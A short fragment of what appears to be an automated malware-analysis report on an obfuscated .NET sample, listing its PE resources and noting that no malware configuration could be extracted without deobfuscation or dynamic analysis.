ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
rzpy0qi6zgghz492eprcqcl1ugy50
hj2htzibusyw55sq47k
Characteristics
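No malware configuration was found at this point. This does not clear the sample: the symbol obfuscation score above is rated very high, so configuration values may only become recoverable after deobfuscation or dynamic analysis.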